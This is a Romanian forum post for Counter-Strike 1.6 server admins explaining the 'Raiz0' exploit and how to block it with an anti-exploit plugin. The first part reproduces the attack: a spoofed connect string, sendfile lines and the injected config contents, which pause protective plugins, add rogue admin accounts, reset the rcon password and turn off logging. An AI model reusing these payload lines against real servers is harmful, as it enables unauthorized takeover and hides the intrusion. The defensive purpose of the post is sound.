Mortall Forum • Tutoriale Counter Strike | Server CS - Resurse - Pluginuri - Download | TeamSpeak3 | Muzica - Bolby Digital | Filme Online - BluRay TrueHD

Raiz0 Exploit creaza fisiere cu extensia cfg in care pune diverse linii, aceste linii rescriu anumite setari ale serverului, de exemplu va schimba parola rcon, va dezactiveaza pluginurile care previn o serie de alte exploit-uri.
Pentru a face asta se foloseste de modulul writefile, exemplu :

COM_WriteFile : addons/amxmodx/configs/maps/de_nuke_rarea.cfg
Ignoring non-customization file upload of addons\amxmodx\configs\maps\de_nuke_rarea.cfg

Cum functioneaza acest exploit:
Atacatorul se conecteaza la server cu:

….connect 48 1899560584
“\prot\3\unique\-1\raw\steam\cdkey\85f1731996f9844694d90d4aa89ad373″
“\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\0\cl_lc\1\cl_lw\1\cl_updaterate\20\model\arctic\name\Alex\team\topcolor\topcolor\30\_dr\raiz0\_laleagane\raiz0\_anzo\raiz0\_hns\raiz0\translit\1\_pw\test\_gm\0630\lang\pl\autobind\v1.0\rate\20000″

...si va executa configul:

{\rtf1\ansi\ansicpg1250\deff0{\fonttbl{\f0\fnil\fcharset238 Calibri;}{\f1\fnil\fcharset0 Calibri;}}
{\*\generator Msftedit 5.41.21.2510;}\viewkind4\uc1\pard\sa200\sl276\slmult1\lang1045\f0\fs22 sendfile "addons\\amxmodx\\configs\\exec.cfg"\par
sendfile "maps.cfg"\par
sendfile "addons\\amxmodx\\configs\\maps\\de_dust.cfg"\par
sendfile "addons\\amxmodx\\configs\\maps\\de_nuke.cfg"\par
sendfile "addons\\amxmodx\\configs\\maps\\de_train.cfg"\par
sendfile "addons\\amxmodx\\configs\\maps\\de_kabul.cfg"\par
sendfile "addons\\amxmodx\\configs\\maps\\de_tuscan.cfg"\par
sendfile "addons\\amxmodx\\configs\\maps\\de_cbble.cfg"\par
sendfile "addons\\amxmodx\\configs\\maps\\de_inferno.cfg"\par
sendfile "addons\\amxmodx\\configs\\maps\\de_dust2.cfg"\par
sendfile "addons\\amxmodx\\configs\\maps\\de_aztec.cfg"\par
sendfile "addons\\amxmodx\\configs\\exec.cfg"\par
sendfile "addons\\metamod\\exec.cfg"\par
sendfile "addons\\amxmodx\\configs\\maps\\de_cpl_strike.cfg"\par
sendfile "addons\\amxmodx\\configs\\maps\\de_cpl_strike.cfg"\par
\lang1033\f1\par
}

Dupa care creeaza urmatoarele fisiere (exemplu):

cs/cstrike/addons/amxmodx/configs/maps/de_italy.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_mjolby6.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_c00l_f.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2_long.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_tuscan.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_vertigo.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_westwood.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_train_32.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_havana.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_perfect_inferno.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_zima.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_amr.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_kabul32.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_kitty_b2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dinaunion.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_arctic.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2x2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_eldorado.cfg
cs/cstrike/addons/amxmodx/configs/maps/as_oilrig.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_kitty.cfgl
cs/cstrike/addons/amxmodx/configs/maps/deathrun_projetocs2.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_lapp.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2_romania.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_alexandra.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_epixi.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_cbble.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_mie.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_kitty2k_b2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust4ever.cfg
cs/cstrike/addons/amxmodx/configs/maps/codex_knife.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_inferno2se.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_nuke32.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_india.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_choklad.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_abaddon.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_kolor_v2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_inferno.cfg
cs/cstrike/addons/amxmodx/configs/maps/35hp_alone.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_helvis.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_siege.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_dixor.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dustyaztec.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_rainbow2k.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_bycastor32.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_zigzag.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_purplez.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_projetocs.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust4.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_backalley.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2_2006.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_train32.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_prodigy.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_italy.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_unreal.cfg
cs/cstrike/addons/amxmodx/configs/maps/css_dust2.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_bhopz_v2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2_2x2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_cpl_mill_32.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_westwood_big.cfg
cs/cstrike/addons/amxmodx/configs/maps/35hp.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dustvsaztec.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_ghosts.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_rainrun.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_rainbow.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_nuke.cfg
cs/cstrike/addons/amxmodx/configs/maps/hnsm_nemesis.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_chateau.cfg
cs/cstrike/addons/amxmodx/configs/maps/31hp_knife_pro.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_airstrip.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_militia.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_piranesi.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_aztec.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_bhopz.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_assault.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_industro.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_rooftops.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_estate.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_kitty_b1.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_aztec2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_assault_hotel.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_nuke_rarea.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_lime.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_train.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_mjolby3.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_3h.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_rooft0ps_remake.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_kabul.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_love.cfg
cs/cstrike/addons/metamod/exec.cfg

Aceste fisiere contin setari ca:

amxx pause rcon_defencer.amxx
amxx pause watfstarter.amxx
amxx pause rcon
amxx pause rcon.amxx
amxx pause krond-functions.amxx
amxx pause forceds_cs_functions_lite_2.1
amxx pause krond
amxx pause krond.amxx
amxx pause function
amx_addadmin "STEAM_0:0:37841280" "abcdefghijklmnopqrstu"
rcon_password "asd123"
amx_addadmin "HLTV" "abcdefghijklmnopqrstu"
amx_addadmin "STEAM_0:0:1337" "abcdefghijklmnopqrstu"
amx_addadmin "Owner" "" "abcdefghijklmnopqrstu" "a"
motdfile motd.txt
log off
mp_logfile 0

Astfel va schimba parola rcon, va avea acces de administrator si va poate manipula serverul.

rcon 1899560584 “198709871234l0l” say Server hacked by raiz0

Prevenirea atacului cu acest exploit.

* INFO: acest plugin necesita Modul: Orpheu v2.6.3 1. ANTI-EXPLOIT
Faceti download la arhiva atasata anti-raiz0-exploit.rar si dezarhivati-o. 2. INSTALARE

Fisierele:
- engine_i686.so
- file_exploit.cfg

si folderul:
- addons
le adaugati in directorul cstrike.
In fisierul server.cfg daugati textul:exec file_exploit.cfg
Deschideti fisierul plugins.ini (../cstrike/addons/amxmodx/configs/plugins.ini) si adaugati textul:File_exploit_rcon_hack.amxx
Salvati si inchideti fisierul.

> Faceti UPDATE la Dproto la ultima versiune: * Restart server
Deschideti consola rcon si scrieti meta list pentru a verifica daca sa incarcat modulul Orpheu:

- Orpheu RUN - orpheu_amxx_i386 v2.3